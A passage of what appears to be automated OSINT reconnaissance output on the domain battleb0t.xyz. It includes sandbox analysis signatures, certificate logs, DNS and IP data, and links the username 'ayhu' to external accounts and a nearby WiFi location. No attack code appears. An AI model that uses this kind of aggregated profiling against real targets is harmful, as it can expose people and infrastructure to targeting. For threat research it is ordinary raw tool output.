Trident/7.0; rv:11.0) like Gecko\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar17A3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar17A4.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3664"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_IE_EarlyTabStart_0xe60_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_ConnHashTable<3664>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_e50_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_e50_ConnHashTable<3664>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e50_IESQMMUTEX_0_303"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "N0EQF2XV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N0EQF2XV.txt]- [targetUID: 00000000-00003664]\n Dropped file: "7D2Y51ZU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7D2Y51ZU.txt]- [targetUID: 00000000-00003664]\n Dropped file: "CD5VNIO4.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CD5VNIO4.txt]- [targetUID: 00000000-00003080]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab17A2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab1791.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003080]\n "Tar17A3.tmp" has type "data"- Location: [%TEMP%\\Tar17A3.tmp]- [targetUID: 00000000-00003080]\n "~DFD224B327448F3092.TMP" has type "data"- Location: [%TEMP%\\~DFD224B327448F3092.TMP]- [targetUID: 00000000-00003664]\n "~DF2BFAF84F2483A9EA.TMP" has type "data"- Location: [%TEMP%\\~DF2BFAF84F2483A9EA.TMP]- [targetUID: 00000000-00003664]\n "~DF07EEC741044523D3.TMP" has type "data"- Location: [%TEMP%\\~DF07EEC741044523D3.TMP]- [targetUID: 00000000-00003664]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003080]\n "N0EQF2XV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N0EQF2XV.txt]- [targetUID: 00000000-00003664]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar17A4.tmp" has type "data"- Location: [%TEMP%\\Tar17A4.tmp]- [targetUID: 00000000-00003080]\n "~DF6A3365F64F9D0A70.TMP" has type "data"- Location: [%TEMP%\\~DF6A3365F64F9D0A70.TMP]- [targetUID: 00000000-00003664]\n "Cab17A2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab17A2.tmp]- [targetUID: 00000000-00003080]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003664]\n 
"RecoveryStore._8662D845-7FF9-11ED-8F03-0800277C4D18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "7D2Y51ZU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7D2Y51ZU.txt]- [targetUID: 00000000-00003664]\n "site_1_.webmanifest" has type "JSON data"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003080]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003080]\n "_8662D847-7FF9-11ED-8F03-0800277C4D18_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.eleuzina.sk/site.webmanifest"\n Pattern match: "https://www.eleuzina.sk"\n Pattern match: "www.eleuzina.sk"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: 
www.eleuzina.sk\nDNT: 1\nConnection: Keep-Alive"\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 0\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 285\nContent-Type: application/octet-stream\nDate: Tue, 20 Dec 2022 00:54:55 GMT\nEtag: "50b305a2becc1418afde3a122a99e9e1-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GMPGDGGGDB0PF7SK4KRJ | 104.196.30.220 |
| 2023-05-12 03:09:35 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 214.30.196.104.bc.googleusercontent.com | 104.196.30.214 |
| 2023-05-12 02:46:53 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cloudflare.net | route2.mx.cloudflare.net |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Linktree (Category: social)
https://linktr.ee/ayhu | ayhu |
| 2023-05-12 02:52:59 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | www.battleb0t.xyz |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.138): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:d7:c6:91:a2:7d:90:36:47:61:e7:f4:42:67:85:
67:bc:f6:01:51:cb:59:02:c5:69:c6:fb:5b:1b:b9:
c9:4a:2c:0e:df:23:05:55:0f:d4:97:b3:0f:c2:a8:
12:d7:19:fa:98:f0:06:8c:43:18:24:de:aa:3e:e6:
c7:25:79:67:99
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:65:02:30:7d:70:13:0d:8c:86:f5:d2:71:80:52:b0:81:9f:
d1:36:dd:fc:cb:3b:22:94:33:e2:be:58:b6:3f:ed:5d:35:71:
fe:92:a5:53:e0:f1:36:f0:a2:e7:eb:a2:ad:86:80:be:02:31:
00:b4:75:e4:7e:fc:a0:b6:34:ee:54:89:8a:b5:86:bf:2b:19:
a0:d9:77:ee:64:10:e8:70:df:08:20:8e:21:54:dc:0c:9d:83:
c5:fb:9a:5e:61:df:01:60:14:be:f2:93:65
|
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Giphy (Category: social)
https://giphy.com/channel/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 03:11:20 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60313, Germany, Europe | 165.232.113.85 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.59): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EC:0F:F7) | 41.8781, -87.6298 |
| 2023-05-12 02:57:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 68, u'compromised_hosts': [u'35.229.48.116', u'35.229.48.116'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'http://mysqldump.guru/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"mysqldump.guru"\n "x1.c.lencr.org"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_854_ConnHashTable<2132>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_854_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2132"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_854_IE_EarlyTabStart_0xc68_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_854_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_854_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_854_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': 
